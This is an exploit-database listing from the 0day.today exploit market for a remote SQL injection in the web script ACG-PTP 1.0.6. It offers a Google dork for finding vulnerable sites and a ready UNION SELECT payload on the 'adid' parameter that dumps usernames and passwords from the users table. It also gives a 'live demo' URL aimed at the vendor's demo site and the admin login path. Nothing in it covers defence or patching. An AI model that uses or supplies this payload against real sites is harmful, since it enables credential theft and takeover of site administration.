[ authorization ] [ registration ] [ restore account ]
Contact us
You can contact us by:
0day Today Exploits Market and 0day Exploits Database

ACG-PTP 1.0.6 (adid) Remote SQL Injection Vulnerability

Author
Hussin X
Risk
[
Security Risk Unsored
]
0day-ID
0day-ID-3596
Category
web applications
Date add
03-09-2008
Platform
unsorted
=======================================================
ACG-PTP 1.0.6 (adid) Remote SQL Injection Vulnerability
=======================================================



|___________________________________________________|
|
| ACG-PTP 1.0.6 (adid) Remote SQL Injection Vulnerability
|
|___________________________________________________
|---------------------Hussin X----------------------|
|
|    Author: Hussin X
|
|
|___________________________________________________
|                                                   |
|
| script :http://discountedscripts.com/product_info.php?products_id=65
|
| DorK   : inurl:index.php?menu=adorder
|___________________________________________________|

Exploit: 
________



www.[target].com/Script/index.php?menu=adorder&adid=-3+union+select+null,null,concat_ws(0x3a,username,password),null+From+users--






L!VE DEMO:
_________


http://www.discountedscripts.com/demos/acg-ptp/index.php?menu=adorder&adid=-3+union+select+null,null,concat_ws(0x3a,username,password),null+From+users--


____________

Admin Login :

www.[target].com/Script/admin/

____________



#  0day.today [2024-12-26]  #